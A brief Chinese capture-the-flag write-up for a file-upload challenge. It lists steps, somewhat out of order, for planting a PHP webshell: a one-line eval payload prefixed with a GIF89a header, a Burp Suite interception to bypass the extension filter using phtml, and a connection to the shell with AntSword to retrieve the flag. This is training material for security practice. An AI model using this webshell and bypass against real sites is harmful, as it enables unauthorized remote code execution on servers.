[极客大挑战 2019]Upload 1

1、尝试上传jpg文件，上传成功

2、使用蚁剑连接

3、打开链接

4、更换一句话木马语句：GIF89a?eval($_REQUEST[1])

5、发现只有phtml成功，但是不能存在

6、这是一个文件上传题，尝试上传一个php文件，无法成功上传

7、上传的文件一般存放在upload文件夹下

8、使用burpsuite抓包绕过，后缀php、phpphpphpphtm、phtml

9、进入文件管理，找到flag